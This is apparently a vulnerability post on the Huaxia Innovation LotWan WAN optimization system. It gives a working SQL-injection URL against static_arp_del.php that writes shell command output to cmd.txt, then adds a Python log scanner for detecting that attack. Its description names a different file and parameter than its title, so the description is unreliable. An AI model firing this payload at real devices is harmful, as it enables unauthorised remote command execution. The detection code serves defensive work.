Huaxia Innovation LotWan WAN Optimization System Static_arp_del.php SQL Injection Vulnerability
Vulnerability Description
The ins parameter of the check_instance_state.php file in the Huaxia Innovation LotWan WAN optimization system allows command splicing, resulting in a remote command execution vulnerability.
Vulnerability Impact
Huaxia Innovation LotWan WAN Optimization System
Network surveying and mapping
Vulnerability Reproduction
Login page
The vulnerable file is static_arp_del.php; a UNION injection is used to write to a file.
/acc/bindipmac/static_arp_del.php?x=1&arpName=1' and 0 union select 1,'||id>cmd.txt||',3,4,5,6,7,8--
Visit /acc/bindipmac/cmd.txt again
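Detection example (added here, not part of the original post or the vendor's code): a log check for the two requests shown above, flagging arpName values that carry SQL or shell syntax and reads of non-PHP files under /acc/bindipmac/. The combined log format, the arpName allow-list, and the idea that this directory normally serves only PHP scripts are assumptions; the sample lines are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines; not captured from a real device.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "GET /acc/bindipmac/static_arp_del.php?x=1&arpName=office-pc HTTP/1.1" 200 12
10.0.0.9 - - [01/Jan/2024:10:01:00 +0000] "GET /acc/bindipmac/static_arp_del.php?x=1&arpName=1'%20and%200%20union%20select%201,'||id>cmd.txt||',3,4,5,6,7,8-- HTTP/1.1" 200 12
10.0.0.9 - - [01/Jan/2024:10:01:05 +0000] "GET /acc/bindipmac/cmd.txt HTTP/1.1" 200 54
10.0.0.5 - - [01/Jan/2024:10:02:00 +0000] "GET /acc/index.php HTTP/1.1" 200 900
"""

LINE = re.compile(r'^(\S+) .*?"(?:GET|POST) (.+?) HTTP/[\d.]+" (\d{3})')
VULN_PATH = "/acc/bindipmac/static_arp_del.php"
VULN_DIR = "/acc/bindipmac/"
# Assumption: a legitimate arpName is a short identifier.
SAFE_NAME = re.compile(r"[\w.:-]{1,64}")
SIGNS = {
    "quote": re.compile(r"'"),
    "union-select": re.compile(r"union\s+select", re.I),
    "shell-metachar": re.compile(r"[|;&`>]|\$\("),
}

def scan(log_text):
    """Return a list of (client, reason, path) findings."""
    findings, flagged_clients = [], set()
    for line in log_text.splitlines():
        m = LINE.match(line)
        if not m:
            continue
        client, target, status = m.group(1), m.group(2), m.group(3)
        url = urlsplit(target)
        if url.path == VULN_PATH:
            for value in parse_qs(url.query, keep_blank_values=True).get("arpName", []):
                if SAFE_NAME.fullmatch(value):
                    continue
                hits = [n for n, rx in SIGNS.items() if rx.search(value)] or ["not-allow-listed"]
                findings.append((client, "injection:" + ",".join(hits), url.path))
                flagged_clients.add(client)
        elif (url.path.startswith(VULN_DIR) and not url.path.endswith(".php")
              and status == "200"):
            # Assumption: this directory normally serves only PHP scripts.
            tag = "dropped-file-read" + ("(after-injection)" if client in flagged_clients else "")
            findings.append((client, tag, url.path))
    return findings

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

A 200 response on a non-PHP file in that directory is the stronger signal of the two, since it indicates the write succeeded rather than only that it was attempted.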
This post is licensed under CC BY 4.0 by the author.